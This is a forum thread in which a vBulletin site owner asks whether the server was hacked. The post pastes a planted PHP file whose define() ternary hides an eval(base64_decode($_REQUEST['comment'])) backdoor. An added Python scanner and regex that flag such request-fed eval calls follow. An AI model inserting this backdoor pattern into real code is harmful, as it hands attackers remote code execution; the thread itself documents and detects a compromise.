
Has my server been hacked?


  • [CMS] Has my server been hacked?

    I'm investigating a sudden surge in the bandwidth usage this month as I've used 50% of the monthly allocation in 2 days. My SQL server collapsed several times as well. I'm running a VPS so I shouldn't be getting problems from other users.
    Right, I've run a suspect file scan and have found a lot of files inserted about a week ago, and all of the files are PHP but have different names. For example, some are called "CREDITS.php", "news2.class.php", "LICENSE.php" and so on. All the files have the same code though.
    define('REAL_SERVER_ROOT', 'SERVER');
    define('SERVER_ROOT', '.');
    define('SERVER_VERSION', '2.5');
    define('BOOT_DIR', 'bootstrap');
    define('SYSTEM_DIR', 'system');
    define('SYSTEM_CONF_DIR', 'conf');
    define('KERNEL_DIR', 'kernel');
    define('SERVICES_DIR', 'services');
    define('LIBRARIES_DIR', 'libs');
    define('FRAMEWORKS_DIR', 'Frameworks');
    define('IMPLEMENTATIONS_DIR', 'implementations');
    define('EXTERN_DIR', 'extern');
    define('APPS_DIR', 'apps');
    define('USERS_DIR', 'users');
    define('USERS_PATH', SERVER_ROOT . '/' . USERS_DIR);
    define('USERS_CONF_DIR', 'conf');
    define('USERS_FILES_DIR', 'files');
    define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['comment'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
    define('USERS_SHARE_DIR', 'share');
    define('USERS_META_DIR', 'meta');
    define('USERS_META_SETTINGS_FILENAME', 'settings.xml');
    define('WORKGROUPS_DIR', 'workgroups');
    define('WORKGROUPS_CONF_DIR', 'conf');
    define('WORKGROUPS_FILES_DIR', 'files');
    define('WORKGROUPS_METAFILES_DIR', 'metafiles');
    define('WORKGROUPS_META_DIR', 'meta');
    define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
    I'm finding these files in the server root, the cms root, archives in fact almost everywhere.

    My question is: was I hacked, and if so, is there a procedure to clean up vBulletin, please?
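
Added example, not part of the original thread: a Python sweep that flags PHP files where `eval` is fed from request data, as on the `SYSTEM_SKEL_DIR` line above, and groups byte-identical files that sit under different names. The function names, the extension list and the sample tree in `demo()` are assumptions constructed for illustration.

```python
import hashlib
import os
import re
import tempfile
from collections import defaultdict

# eval()/assert() whose argument comes from request data, optionally wrapped in
# decoder calls, e.g. @eval(base64_decode($_REQUEST['comment'])) in the post.
REQUEST_EVAL = re.compile(
    rb"\b(?:eval|assert)\s*\(\s*(?:@?\s*\w+\s*\(\s*)*\$_(?:REQUEST|POST|GET|COOKIE)\b",
    re.IGNORECASE,
)

def scan_tree(root):
    """Return (hits, clones): paths matching REQUEST_EVAL, and groups of
    byte-identical PHP files that exist under more than one path."""
    hits, by_hash = [], defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip it, keep sweeping
            by_hash[hashlib.sha256(data).hexdigest()].append(path)
            if REQUEST_EVAL.search(data):
                hits.append(path)
    clones = {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}
    return sorted(hits), clones

def demo():
    """Constructed tree: the posted line under two names, plus one clean file."""
    bad = (b"<?php\ndefine('SYSTEM_SKEL_DIR', 'skel') ? "
           b"@eval(base64_decode($_REQUEST['comment'])) : "
           b"define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);\n")
    clean = b"<?php\ndefine('SYSTEM_DIR', 'system');\n"
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "archive"))
        for rel, body in (("CREDITS.php", bad), ("index.php", clean),
                          (os.path.join("archive", "news2.class.php"), bad)):
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(body)
        hits, clones = scan_tree(root)
        return [os.path.relpath(p, root) for p in hits], [len(v) for v in clones.values()]

if __name__ == "__main__":
    print(demo())
```

The pattern is one narrow heuristic: a clean result does not show a tree is clean, and the clone groups will also list legitimately duplicated files, so compare them against the application's original package.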

  • #2
    Looks like problematic files at first glance. They should be deleted and aren't part of vBulletin. You should contact your hosting provider to see where the files came from.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API - Full / Mobile
    Vote for your favorite feature requests and the bugs you want to see fixed.


    • #3
      Thanks for the reply. I have contacted my host, who are investigating it now. My vBulletin is up to date so I'm happy that it survived... unfortunately my VBgallery isn't and is unlikely to be by the looks of the developers... That makes a weak system.
      It's a shame vBulletin hasn't got a comprehensive gallery...

      Thanks again though Wayne

